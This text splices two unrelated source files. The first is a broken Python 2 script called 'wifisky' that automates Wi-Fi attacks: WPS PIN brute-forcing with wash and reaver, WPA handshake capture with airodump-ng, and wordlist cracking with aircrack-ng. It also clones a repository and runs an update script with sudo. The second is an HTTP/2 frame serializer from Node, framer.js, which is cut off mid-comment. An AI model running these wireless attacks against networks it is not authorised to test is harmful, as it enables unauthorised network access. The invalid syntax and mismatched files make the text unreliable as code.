#Wash is an auxiliary tool designed to display WPS enabled Access Points and their main characteristics. Wash is included in the Reaver package.
#Homepage: https://github.com/t6x/reaver-wps-fork-t6x
#Author: Tactical Network Solutions, Craig Heffner, t6_x, DataHead, Soxrok2212
#License: GPLv2
#Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2
#Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
#Reaver Homepage | Kali Reaver Repo
#Author: Tactical Network Solutions, Craig Heffner
##License: GPLv2
logo = """\033[93m __ ___ __ __
.--.--.--.|__|.' _|__|.-----.| |--.--.--.
| | | || || _| ||__ --|| <| | |
|________||__||__| |__||_____||__|__|___ |
\033[91m }--{+} Coded By Manisso {+}--{\033[0m\033[93m|_____|\033[0m
"""
menu = """\033[97m
{1}--WPS ATTACK
{2}--WPA/WPA2 ATTACK
{3}--CAP BRUTFORCE
{0}--INSTALL & UPDATE
{99}-EXIT
"""
if not os.geteuid() == 0:
sys.exit("""\033[1;91m\n[!] Must be run as root. [!]\n\033[1;m""")
os.system("clear && clear")
print logo
print menu
def | ():
con = raw_input('Continue [Y/n] -> ')
if con[0].upper() == 'N':
exit()
else:
os.system("clear")
print logo
print menu
select()
def select():
try:
choice = input("\033[92mWIFISKY~# \033[0m")
if choice == 1:
os.system("airmon-ng")
interface = raw_input("Enter your Interface : ")
inter = 'ifconfig {0} down && iwconfig {0} mode monitor && ifconfig {0} up'.format(interface)
system(inter)
wash = 'wash -i {0}'.format(interface)
print "\033[1mCtrl + C To Stop \033[0m"
system(wash)
print (" ")
bssid = raw_input("BSSID: ")
print "\033[1mWPS ATTACK will start now\033[0m"
sleep(5)
reaver = 'reaver -i {0} -b {1} '.format(interface, bssid)
system(reaver)
elif choice == 2:
os.system("airmon-ng")
interface = raw_input("Enter your Interface : ")
inter = 'ifconfig {0} down && iwconfig {0} mode monitor && ifconfig {0} up'.format(interface)
system(inter)
dump = 'airodump-ng {0}'.format(interface)
print "\033[1mCtrl + C To Stop \033[0m"
sleep(3)
system(dump)
print (" ")
bssid = raw_input("BSSID: ")
ch = raw_input("channel : ")
sv = raw_input("File Name : ")
airo = 'airodump-ng -c {0} --bssid {1} -w {2} {3}'.format(ch, bssid, sv, interface)
system(airo)
elif choice == 99:
exit
elif choice == 0:
os.system("clear")
print("This tool is only available for Linux and similar systems ")
os.system("git clone https://github.com/Manisso/wifisky.git")
os.system("cd wifisky && sudo bash ./update.sh")
os.system("wifisky")
elif choice == 3:
wordlist = raw_input("wordlist : ")
save2 = raw_input("Enter the CAP file name : ")
crack = 'aircrack-ng {0} -w {1} '.format(save2, wordlist)
system(crack)
except(KeyboardInterrupt):
print ""
select()
| quit |
framer.js | // The framer consists of two [Transform Stream][1] subclasses that operate in [object mode][2]:
// the Serializer and the Deserializer
// [1]: https://nodejs.org/api/stream.html#stream_class_stream_transform
// [2]: https://nodejs.org/api/stream.html#stream_new_stream_readable_options
var assert = require('assert');
var Transform = require('stream').Transform;
exports.Serializer = Serializer;
exports.Deserializer = Deserializer;
var logData = (process !== 'undefined' && process.env !== 'undefined' && process.env.HTTP2_LOG_DATA);
var MAX_PAYLOAD_SIZE = 16384;
var WINDOW_UPDATE_PAYLOAD_SIZE = 4;
// Serializer
// ----------
//
// Frame Objects
// * * * * * * * --+---------------------------
// | |
// v v Buffers
// [] -----> Payload Ser. --[buffers]--> Header Ser. --> * * * *
// empty adds payload adds header
// array buffers buffer
function Serializer(log) {
this._log = log.child({ component: 'serializer' });
Transform.call(this, { objectMode: true });
}
Serializer.prototype = Object.create(Transform.prototype, { constructor: { value: Serializer } });
// When there's an incoming frame object, it first generates the frame type specific part of the
// frame (payload), and then then adds the header part which holds fields that are common to all
// frame types (like the length of the payload).
Serializer.prototype._transform = function _transform(frame, encoding, done) {
this._log.trace({ frame: frame }, 'Outgoing frame');
assert(frame.type in Serializer, 'Unknown frame type: ' + frame.type);
var buffers = [];
Serializer[frame.type](frame, buffers);
var length = Serializer.commonHeader(frame, buffers);
assert(length <= MAX_PAYLOAD_SIZE, 'Frame too large!');
for (var i = 0; i < buffers.length; i++) {
if (logData) {
this._log.trace({ data: buffers[i] }, 'Outgoing data');
}
this.push(buffers[i]);
}
done();
};
// Deserializer
// ------------
//
// Buffers
// * * * * --------+-------------------------
// | |
// v v Frame Objects
// {} -----> Header Des. --{frame}--> Payload Des. --> * * * * * * *
// empty adds parsed adds parsed
// object header properties payload properties
function Deserializer(log, role) {
this._role = role;
this._log = log.child({ component: 'deserializer' });
Transform.call(this, { objectMode: true });
this._next(COMMON_HEADER_SIZE);
}
Deserializer.prototype = Object.create(Transform.prototype, { constructor: { value: Deserializer } });
// The Deserializer is stateful, and it's two main alternating states are: *waiting for header* and
// *waiting for payload*. The state is stored in the boolean property `_waitingForHeader`.
//
// When entering a new state, a `_buffer` is created that will hold the accumulated data (header or
// payload). The `_cursor` is used to track the progress.
Deserializer.prototype._next = function(size) {
this._cursor = 0;
this._buffer = new Buffer(size);
this._waitingForHeader = !this._waitingForHeader;
if (this._waitingForHeader) {
this._frame = {};
}
};
// Parsing an incoming buffer is an iterative process because it can hold multiple frames if it's
// large enough. A `cursor` is used to track the progress in parsing the incoming `chunk`.
Deserializer.prototype._transform = function _transform(chunk, encoding, done) {
var cursor = 0;
if (logData) {
this._log.trace({ data: chunk }, 'Incoming data');
}
while(cursor < chunk.length) {
// The content of an incoming buffer is first copied to `_buffer`. If it can't hold the full
// chunk, then only a part of it is copied.
var toCopy = Math.min(chunk.length - cursor, this._buffer.length - this._cursor);
chunk.copy(this._buffer, this._cursor, cursor, cursor + toCopy);
this._cursor += toCopy;
cursor += toCopy;
// When `_buffer` is full, it's content gets parsed either as header or payload depending on
// the actual state.
// If it's header then the parsed data is stored in a temporary variable and then the
// deserializer waits for the specified length payload.
if ((this._cursor === this._buffer.length) && this._waitingForHeader) {
var payloadSize = Deserializer.commonHeader(this._buffer, this._frame);
if (payloadSize <= MAX_PAYLOAD_SIZE) {
this._next(payloadSize);
} else {
this.emit('error', 'FRAME_SIZE_ERROR');
return;
}
}
// If it's payload then the the frame object is finalized and then gets pushed out.
// Unknown frame types are ignored.
//
// Note: If we just finished the parsing of a header and the payload length is 0, this branch
// will also run.
if ((this._cursor === this._buffer.length) && !this._waitingForHeader) {
if (this._frame.type) {
var error = Deserializer[this._frame.type](this._buffer, this._frame, this._role);
if (error) {
this._log.error('Incoming frame parsing error: ' + error);
this.emit('error', error);
} else {
this._log.trace({ frame: this._frame }, 'Incoming frame');
this.push(this._frame);
}
} else {
this._log.error('Unknown type incoming frame');
// Ignore it other than logging
}
this._next(COMMON_HEADER_SIZE);
}
}
done();
};
// [Frame Header](https://tools.ietf.org/html/rfc7540#section-4.1)
// --------------------------------------------------------------
//
// HTTP/2 frames share a common base format consisting of a 9-byte header followed by 0 to 2^24 - 1
// bytes of data.
//
// Additional size limits can be set by specific application uses. HTTP limits the frame size to
// 16,384 octets by default, though this can be increased by a receiver.
//
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Length (24) |
// +---------------+---------------+---------------+
// | Type (8) | Flags (8) |
// +-+-----------------------------+---------------+---------------+
// |R| Stream Identifier (31) |
// +-+-------------------------------------------------------------+
// | Frame Data (0...) ...
// +---------------------------------------------------------------+
//
// The fields of the frame header are defined as:
//
// * Length:
// The length of the frame data expressed as an unsigned 24-bit integer. The 9 bytes of the frame
// header are not included in this value.
//
// * Type:
// The 8-bit type of the frame. The frame type determines how the remainder of the frame header
// and data are interpreted. Implementations MUST ignore unsupported and unrecognized frame types.
//
// * Flags:
// An 8-bit field reserved for frame-type specific boolean flags.
//
// Flags are assigned semantics specific to the indicated frame type. Flags that have no defined
// semantics for a particular frame type MUST be ignored, and MUST be left unset (0) when sending.
//
// * R:
// A reserved 1-bit field. The semantics of this bit are undefined and the bit MUST remain unset
// (0) when sending and MUST be ignored when receiving.
//
// * Stream Identifier:
// A 31-bit stream identifier. The value 0 is reserved for frames that are associated with the
// connection as a whole as opposed to an individual stream.
//
// The structure and content of the remaining frame data is dependent entirely on the frame type.
var COMMON_HEADER_SIZE = 9;
var frameTypes = [];
var frameFlags = {};
var genericAttributes = ['type', 'flags', 'stream'];
var typeSpecificAttributes = {};
Serializer.commonHeader = function writeCommonHeader(frame, buffers) {
var headerBuffer = new Buffer(COMMON_HEADER_SIZE);
var size = 0;
for (var i = 0; i < buffers.length; i++) {
size += buffers[i].length;
}
headerBuffer.writeUInt8(0, 0);
headerBuffer.writeUInt16BE(size, 1);
var typeId = frameTypes.indexOf(frame.type); // If we are here then the type is valid for sure
headerBuffer.writeUInt8(typeId, 3);
var flagByte = 0;
for (var flag in frame.flags) {
var position = frameFlags[frame.type].indexOf(flag);
assert(position !== -1, 'Unknown flag for frame type ' + frame.type + ': ' + flag);
if (frame.flags[flag]) {
flagByte |= (1 << position);
}
}
headerBuffer.writeUInt8(flagByte, 4);
assert((0 <= frame.stream) && (frame.stream < 0x7fffffff), frame.stream);
headerBuffer.writeUInt32BE(frame.stream || 0, 5);
buffers.unshift(headerBuffer);
return size;
};
Deserializer.commonHeader = function readCommonHeader(buffer, frame) {
if (buffer.length < 9) {
return 'FRAME_SIZE_ERROR';
}
var totallyWastedByte = buffer.readUInt8(0);
var length = buffer.readUInt16BE(1);
// We do this just for sanity checking later on, to make sure no one sent us a
// frame that's super large.
length += totallyWastedByte << 16;
frame.type = frameTypes[buffer.readUInt8(3)];
if (!frame.type) {
// We are required to ignore unknown frame types
return length;
}
frame.flags = {};
var flagByte = buffer.readUInt8(4);
var definedFlags = frameFlags[frame.type];
for (var i = 0; i < definedFlags.length; i++) {
frame.flags[definedFlags[i]] = Boolean(flagByte & (1 << i));
}
frame.stream = buffer.readUInt32BE(5) & 0x7fffffff;
return length;
};
// Frame types
// ===========
// Every frame type is registered in the following places:
//
// * `frameTypes`: a register of frame type codes (used by `commonHeader()`)
// * `frameFlags`: a register of valid flags for frame types (used by `commonHeader()`)
// * `typeSpecificAttributes`: a register of frame specific frame object attributes (used by
// logging code and also serves as documentation for frame objects)
// [DATA Frames](https://tools.ietf.org/html/rfc7540#section-6.1)
// ------------------------------------------------------------
//
// DATA frames (type=0x0) convey arbitrary, variable-length sequences of octets associated with a
// stream.
//
// The DATA frame defines the following flags:
//
// * END_STREAM (0x1):
// Bit 1 being set indicates that this frame is the last that the endpoint will send for the
// identified stream.
// * PADDED (0x08):
// Bit 4 being set indicates that the Pad Length field is present.
frameTypes[0x0] = 'DATA';
frameFlags.DATA = ['END_STREAM', 'RESERVED2', 'RESERVED4', 'PADDED'];
typeSpecificAttributes.DATA = ['data'];
Serializer.DATA = function writeData(frame, buffers) {
buffers.push(frame.data);
};
Deserializer.DATA = function readData(buffer, frame) {
var dataOffset = 0;
var paddingLength = 0;
if (frame.flags.PADDED) {
if (buffer.length < 1) {
// We must have at least one byte for padding control, but we don't. Bad peer!
return 'FRAME_SIZE_ERROR';
}
paddingLength = (buffer.readUInt8(dataOffset) & 0xff);
dataOffset = 1;
}
if (paddingLength) {
if (paddingLength >= (buffer.length - 1)) {
// We don't have enough room for the padding advertised - bad peer!
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer.slice(dataOffset, -1 * paddingLength);
} else {
frame.data = buffer.slice(dataOffset);
}
};
// [HEADERS](https://tools.ietf.org/html/rfc7540#section-6.2)
// --------------------------------------------------------------
//
// The HEADERS frame (type=0x1) allows the sender to create a stream.
//
// The HEADERS frame defines the following flags:
//
// * END_STREAM (0x1):
// Bit 1 being set indicates that this frame is the last that the endpoint will send for the
// identified stream.
// * END_HEADERS (0x4):
// The END_HEADERS bit indicates that this frame contains the entire payload necessary to provide
// a complete set of headers.
// * PADDED (0x08):
// Bit 4 being set indicates that the Pad Length field is present.
// * PRIORITY (0x20):
// Bit 6 being set indicates that the Exlusive Flag (E), Stream Dependency, and Weight fields are
// present.
frameTypes[0x1] = 'HEADERS';
frameFlags.HEADERS = ['END_STREAM', 'RESERVED2', 'END_HEADERS', 'PADDED', 'RESERVED5', 'PRIORITY'];
typeSpecificAttributes.HEADERS = ['priorityDependency', 'priorityWeight', 'exclusiveDependency', 'headers', 'data'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |Pad Length? (8)|
// +-+-------------+---------------+-------------------------------+
// |E| Stream Dependency? (31) |
// +-+-------------+-----------------------------------------------+
// | Weight? (8) |
// +-+-------------+-----------------------------------------------+
// | Header Block Fragment (*) ...
// +---------------------------------------------------------------+
// | Padding (*) ...
// +---------------------------------------------------------------+
//
// The payload of a HEADERS frame contains a Headers Block
Serializer.HEADERS = function writeHeadersPriority(frame, buffers) {
if (frame.flags.PRIORITY) {
var buffer = new Buffer(5);
assert((0 <= frame.priorityDependency) && (frame.priorityDependency <= 0x7fffffff), frame.priorityDependency);
buffer.writeUInt32BE(frame.priorityDependency, 0);
if (frame.exclusiveDependency) {
buffer[0] |= 0x80;
}
assert((0 <= frame.priorityWeight) && (frame.priorityWeight <= 0xff), frame.priorityWeight);
buffer.writeUInt8(frame.priorityWeight, 4);
buffers.push(buffer);
}
buffers.push(frame.data);
};
Deserializer.HEADERS = function readHeadersPriority(buffer, frame) {
var minFrameLength = 0;
if (frame.flags.PADDED) {
minFrameLength += 1;
}
if (frame.flags.PRIORITY) {
minFrameLength += 5;
}
if (buffer.length < minFrameLength) {
// Peer didn't send enough data - bad peer!
return 'FRAME_SIZE_ERROR';
}
var dataOffset = 0;
var paddingLength = 0;
if (frame.flags.PADDED) {
paddingLength = (buffer.readUInt8(dataOffset) & 0xff);
dataOffset = 1;
}
if (frame.flags.PRIORITY) {
var dependencyData = new Buffer(4);
buffer.copy(dependencyData, 0, dataOffset, dataOffset + 4);
dataOffset += 4;
frame.exclusiveDependency = !!(dependencyData[0] & 0x80);
dependencyData[0] &= 0x7f;
frame.priorityDependency = dependencyData.readUInt32BE(0);
frame.priorityWeight = buffer.readUInt8(dataOffset);
dataOffset += 1;
}
if (paddingLength) {
if ((buffer.length - dataOffset) < paddingLength) {
// Not enough data left to satisfy the advertised padding - bad peer!
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer.slice(dataOffset, -1 * paddingLength);
} else {
frame.data = buffer.slice(dataOffset);
}
};
// [PRIORITY](https://tools.ietf.org/html/rfc7540#section-6.3)
// -------------------------------------------------------
//
// The PRIORITY frame (type=0x2) specifies the sender-advised priority of a stream.
//
// The PRIORITY frame does not define any flags.
frameTypes[0x2] = 'PRIORITY';
frameFlags.PRIORITY = [];
typeSpecificAttributes.PRIORITY = ['priorityDependency', 'priorityWeight', 'exclusiveDependency'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |E| Stream Dependency? (31) |
// +-+-------------+-----------------------------------------------+
// | Weight? (8) |
// +-+-------------+
//
// The payload of a PRIORITY frame contains an exclusive bit, a 31-bit dependency, and an 8-bit weight
Serializer.PRIORITY = function writePriority(frame, buffers) {
var buffer = new Buffer(5);
assert((0 <= frame.priorityDependency) && (frame.priorityDependency <= 0x7fffffff), frame.priorityDependency);
buffer.writeUInt32BE(frame.priorityDependency, 0);
if (frame.exclusiveDependency) {
buffer[0] |= 0x80;
}
assert((0 <= frame.priorityWeight) && (frame.priorityWeight <= 0xff), frame.priorityWeight);
buffer.writeUInt8(frame.priorityWeight, 4);
buffers.push(buffer);
};
Deserializer.PRIORITY = function readPriority(buffer, frame) {
if (buffer.length < 5) {
// PRIORITY frames are 5 bytes long. Bad peer!
return 'FRAME_SIZE_ERROR';
}
var dependencyData = new Buffer(4);
buffer.copy(dependencyData, 0, 0, 4);
frame.exclusiveDependency = !!(dependencyData[0] & 0x80);
dependencyData[0] &= 0x7f;
frame.priorityDependency = dependencyData.readUInt32BE(0);
frame.priorityWeight = buffer.readUInt8(4);
};
// [RST_STREAM](https://tools.ietf.org/html/rfc7540#section-6.4)
// -----------------------------------------------------------
//
// The RST_STREAM frame (type=0x3) allows for abnormal termination of a stream.
//
// No type-flags are defined.
frameTypes[0x3] = 'RST_STREAM';
frameFlags.RST_STREAM = [];
typeSpecificAttributes.RST_STREAM = ['error'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Error Code (32) |
// +---------------------------------------------------------------+
//
// The RST_STREAM frame contains a single unsigned, 32-bit integer identifying the error
// code (see Error Codes). The error code indicates why the stream is being terminated.
Serializer.RST_STREAM = function writeRstStream(frame, buffers) {
var buffer = new Buffer(4);
var code = errorCodes.indexOf(frame.error);
assert((0 <= code) && (code <= 0xffffffff), code);
buffer.writeUInt32BE(code, 0);
buffers.push(buffer);
};
Deserializer.RST_STREAM = function readRstStream(buffer, frame) {
if (buffer.length < 4) {
// RST_STREAM is 4 bytes long. Bad peer!
return 'FRAME_SIZE_ERROR';
}
frame.error = errorCodes[buffer.readUInt32BE(0)];
if (!frame.error) {
// Unknown error codes are considered equivalent to INTERNAL_ERROR
frame.error = 'INTERNAL_ERROR';
}
};
// [SETTINGS](https://tools.ietf.org/html/rfc7540#section-6.5)
// -------------------------------------------------------
//
// The SETTINGS frame (type=0x4) conveys configuration parameters that affect how endpoints
// communicate.
//
// The SETTINGS frame defines the following flag:
// * ACK (0x1):
// Bit 1 being set indicates that this frame acknowledges receipt and application of the peer's
// SETTINGS frame.
frameTypes[0x4] = 'SETTINGS';
frameFlags.SETTINGS = ['ACK'];
typeSpecificAttributes.SETTINGS = ['settings'];
// The payload of a SETTINGS frame consists of zero or more settings. Each setting consists of a
// 16-bit identifier, and an unsigned 32-bit value.
//
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Identifier(16) | Value (32) |
// +-----------------+---------------------------------------------+
// ...Value |
// +---------------------------------+
//
// Each setting in a SETTINGS frame replaces the existing value for that setting. Settings are
// processed in the order in which they appear, and a receiver of a SETTINGS frame does not need to
// maintain any state other than the current value of settings. Therefore, the value of a setting
// is the last value that is seen by a receiver. This permits the inclusion of the same settings
// multiple times in the same SETTINGS frame, though doing so does nothing other than waste
// connection capacity.
Serializer.SETTINGS = function writeSettings(frame, buffers) {
var settings = [], settingsLeft = Object.keys(frame.settings);
definedSettings.forEach(function(setting, id) {
if (setting.name in frame.settings) {
settingsLeft.splice(settingsLeft.indexOf(setting.name), 1);
var value = frame.settings[setting.name];
settings.push({ id: id, value: setting.flag ? Boolean(value) : value });
}
});
assert(settingsLeft.length === 0, 'Unknown settings: ' + settingsLeft.join(', '));
var buffer = new Buffer(settings.length * 6);
for (var i = 0; i < settings.length; i++) {
buffer.writeUInt16BE(settings[i].id & 0xffff, i*6);
buffer.writeUInt32BE(settings[i].value, i*6 + 2);
}
buffers.push(buffer);
};
Deserializer.SETTINGS = function readSettings(buffer, frame, role) {
frame.settings = {};
// Receipt of a SETTINGS frame with the ACK flag set and a length
// field value other than 0 MUST be treated as a connection error
// (Section 5.4.1) of type FRAME_SIZE_ERROR.
if(frame.flags.ACK && buffer.length != 0) {
return 'FRAME_SIZE_ERROR';
}
if (buffer.length % 6 !== 0) {
return 'PROTOCOL_ERROR';
}
for (var i = 0; i < buffer.length / 6; i++) {
var id = buffer.readUInt16BE(i*6) & 0xffff;
var setting = definedSettings[id];
if (setting) {
if (role == 'CLIENT' && setting.name == 'SETTINGS_ENABLE_PUSH') {
return 'SETTINGS frame on client got SETTINGS_ENABLE_PUSH';
}
var value = buffer.readUInt32BE(i*6 + 2);
frame.settings[setting.name] = setting.flag ? Boolean(value & 0x1) : value;
}
}
};
// The following settings are defined:
var definedSettings = [];
// * SETTINGS_HEADER_TABLE_SIZE (1):
// Allows the sender to inform the remote endpoint of the size of the header compression table
// used to decode header blocks.
definedSettings[1] = { name: 'SETTINGS_HEADER_TABLE_SIZE', flag: false };
// * SETTINGS_ENABLE_PUSH (2):
// This setting can be use to disable server push. An endpoint MUST NOT send a PUSH_PROMISE frame
// if it receives this setting set to a value of 0. The default value is 1, which indicates that
// push is permitted.
definedSettings[2] = { name: 'SETTINGS_ENABLE_PUSH', flag: true };
// * SETTINGS_MAX_CONCURRENT_STREAMS (3):
// indicates the maximum number of concurrent streams that the sender will allow.
definedSettings[3] = { name: 'SETTINGS_MAX_CONCURRENT_STREAMS', flag: false };
// * SETTINGS_INITIAL_WINDOW_SIZE (4):
// indicates the sender's initial stream window size (in bytes) for new streams.
definedSettings[4] = { name: 'SETTINGS_INITIAL_WINDOW_SIZE', flag: false };
// * SETTINGS_MAX_FRAME_SIZE (5):
// indicates the maximum size of a frame the receiver will allow.
definedSettings[5] = { name: 'SETTINGS_MAX_FRAME_SIZE', flag: false };
// [PUSH_PROMISE](https://tools.ietf.org/html/rfc7540#section-6.6)
// ---------------------------------------------------------------
//
// The PUSH_PROMISE frame (type=0x5) is used to notify the peer endpoint in advance of streams the
// sender intends to initiate.
//
// The PUSH_PROMISE frame defines the following flags:
//
// * END_PUSH_PROMISE (0x4):
// The END_PUSH_PROMISE bit indicates that this frame contains the entire payload necessary to
// provide a complete set of headers.
frameTypes[0x5] = 'PUSH_PROMISE';
frameFlags.PUSH_PROMISE = ['RESERVED1', 'RESERVED2', 'END_PUSH_PROMISE', 'PADDED'];
typeSpecificAttributes.PUSH_PROMISE = ['promised_stream', 'headers', 'data'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |Pad Length? (8)|
// +-+-------------+-----------------------------------------------+
// |X| Promised-Stream-ID (31) |
// +-+-------------------------------------------------------------+
// | Header Block Fragment (*) ...
// +---------------------------------------------------------------+
// | Padding (*) ...
// +---------------------------------------------------------------+
//
// The PUSH_PROMISE frame includes the unsigned 31-bit identifier of
// the stream the endpoint plans to create along with a minimal set of headers that provide
// additional context for the stream.
Serializer.PUSH_PROMISE = function writePushPromise(frame, buffers) {
var buffer = new Buffer(4);
var promised_stream = frame.promised_stream;
assert((0 <= promised_stream) && (promised_stream <= 0x7fffffff), promised_stream);
buffer.writeUInt32BE(promised_stream, 0);
buffers.push(buffer);
buffers.push(frame.data);
};
Deserializer.PUSH_PROMISE = function readPushPromise(buffer, frame) {
if (buffer.length < 4) {
return 'FRAME_SIZE_ERROR';
}
var dataOffset = 0;
var paddingLength = 0;
if (frame.flags.PADDED) {
if (buffer.length < 5) {
return 'FRAME_SIZE_ERROR';
}
paddingLength = (buffer.readUInt8(dataOffset) & 0xff);
dataOffset = 1;
}
frame.promised_stream = buffer.readUInt32BE(dataOffset) & 0x7fffffff;
dataOffset += 4;
if (paddingLength) {
if ((buffer.length - dataOffset) < paddingLength) {
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer.slice(dataOffset, -1 * paddingLength);
} else {
frame.data = buffer.slice(dataOffset);
}
};
// [PING](https://tools.ietf.org/html/rfc7540#section-6.7)
// -----------------------------------------------
//
// The PING frame (type=0x6) is a mechanism for measuring a minimal round-trip time from the
// sender, as well as determining whether an idle connection is still functional.
//
// The PING frame defines one type-specific flag:
//
// * ACK (0x1):
// Bit 1 being set indicates that this PING frame is a PING response.
frameTypes[0x6] = 'PING';
frameFlags.PING = ['ACK'];
typeSpecificAttributes.PING = ['data'];
// In addition to the frame header, PING frames MUST contain 8 additional octets of opaque data.
Serializer.PING = function writePing(frame, buffers) {
buffers.push(frame.data);
};
Deserializer.PING = function readPing(buffer, frame) {
if (buffer.length !== 8) {
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer;
};
// [GOAWAY](https://tools.ietf.org/html/rfc7540#section-6.8)
// ---------------------------------------------------
//
// The GOAWAY frame (type=0x7) informs the remote peer to stop creating streams on this connection.
//
// The GOAWAY frame does not define any flags.
frameTypes[0x7] = 'GOAWAY';
frameFlags.GOAWAY = [];
typeSpecificAttributes.GOAWAY = ['last_stream', 'error'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |X| Last-Stream-ID (31) |
// +-+-------------------------------------------------------------+
// | Error Code (32) |
// +---------------------------------------------------------------+
// | Additional Debug Data (*) |
// +---------------------------------------------------------------+
//
// The last stream identifier in the GOAWAY frame contains the highest numbered stream identifier
// for which the sender of the GOAWAY frame has received frames on and might have taken some action
// on.
//
// The GOAWAY frame also contains a 32-bit error code (see Error Codes) that contains the reason for
// closing the connection.
Serializer.GOAWAY = function writeGoaway(frame, buffers) {
var buffer = new Buffer(8);
var last_stream = frame.last_stream;
assert((0 <= last_stream) && (last_stream <= 0x7fffffff), last_stream);
buffer.writeUInt32BE(last_stream, 0);
var code = errorCodes.indexOf(frame.error);
assert((0 <= code) && (code <= 0xffffffff), code);
buffer.writeUInt32BE(code, 4);
buffers.push(buffer);
};
Deserializer.GOAWAY = function readGoaway(buffer, frame) {
if (buffer.length < 8) {
// GOAWAY must have at least 8 bytes
return 'FRAME_SIZE_ERROR';
}
frame.last_stream = buffer.readUInt32BE(0) & 0x7fffffff;
frame.error = errorCodes[buffer.readUInt32BE(4)];
if (!frame.error) {
// Unknown error types are to be considered equivalent to INTERNAL ERROR
frame.error = 'INTERNAL_ERROR';
}
// Read remaining data into "debug_data"
// https://http2.github.io/http2-spec/#GOAWAY
// Endpoints MAY append opaque data to the payload of any GOAWAY frame
if (buffer.length > 8) {
frame.debug_data = buffer.slice(8);
}
};
// [WINDOW_UPDATE](https://tools.ietf.org/html/rfc7540#section-6.9)
// -----------------------------------------------------------------
//
// The WINDOW_UPDATE frame (type=0x8) is used to implement flow control.
//
// The WINDOW_UPDATE frame does not define any flags.
frameTypes[0x8] = 'WINDOW_UPDATE';
frameFlags.WINDOW_UPDATE = [];
typeSpecificAttributes.WINDOW_UPDATE = ['window_size'];
// The payload of a WINDOW_UPDATE frame is a 32-bit value indicating the additional number of bytes
// that the sender can transmit in addition to the existing flow control window. The legal range
// for this field is 1 to 2^31 - 1 (0x7fffffff) bytes; the most significant bit of this value is
// reserved.
Serializer.WINDOW_UPDATE = function writeWindowUpdate(frame, buffers) {
var buffer = new Buffer(4);
var window_size = frame.window_size;
assert((0 < window_size) && (window_size <= 0x7fffffff), window_size);
buffer.writeUInt32BE(window_size, 0);
buffers.push(buffer);
};
Deserializer.WINDOW_UPDATE = function readWindowUpdate(buffer, frame) {
if (buffer.length !== WINDOW_UPDATE_PAYLOAD_SIZE) {
return 'FRAME_SIZE_ERROR';
}
frame.window_size = buffer.readUInt32BE(0) & 0x7fffffff;
if (frame.window_size === 0) {
return 'PROTOCOL_ERROR';
}
};
// [CONTINUATION](https://tools.ietf.org/html/rfc7540#section-6.10)
// ------------------------------------------------------------
//
// The CONTINUATION frame (type=0x9) is used to continue a sequence of header block fragments.
//
// The CONTINUATION frame defines the following flag:
//
// * END_HEADERS (0x4):
// The END_HEADERS bit indicates that this frame ends the sequence of header block fragments
// necessary to provide a complete set of headers.
frameTypes[0x9] = 'CONTINUATION';
frameFlags.CONTINUATION = ['RESERVED1', 'RESERVED2', 'END_HEADERS'];
typeSpecificAttributes.CONTINUATION = ['headers', 'data'];
Serializer.CONTINUATION = function writeContinuation(frame, buffers) {
buffers.push(frame.data);
};
Deserializer.CONTINUATION = function readContinuation(buffer, frame) {
frame.data = buffer;
};
// [ALTSVC](https://tools.ietf.org/html/rfc7838#section-4)
// ------------------------------------------------------------
//
// The ALTSVC frame (type=0xA) advertises the availability of an alternative service to the client.
//
// The ALTSVC frame does not define any flags.
frameTypes[0xA] = 'ALTSVC';
frameFlags.ALTSVC = [];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Origin-Len (16) | Origin? (*) ...
// +-------------------------------+----------------+--------------+
// | Alt-Svc-Field-Value (*) ...
// +---------------------------------------------------------------+
//
// The ALTSVC frame contains the following fields:
//
// Origin-Len: An unsigned, 16-bit integer indicating the length, in
// octets, of the Origin field.
//
// Origin: An OPTIONAL sequence of characters containing ASCII
// serialisation of an origin ([RFC6454](https://tools.ietf.org/html/rfc6454),
// Section 6.2) that the alternate service is applicable to.
//
// Alt-Svc-Field-Value: A sequence of octets (length determined by
// subtracting the length of all preceding fields from the frame
// length) containing a value identical to the Alt-Svc field value
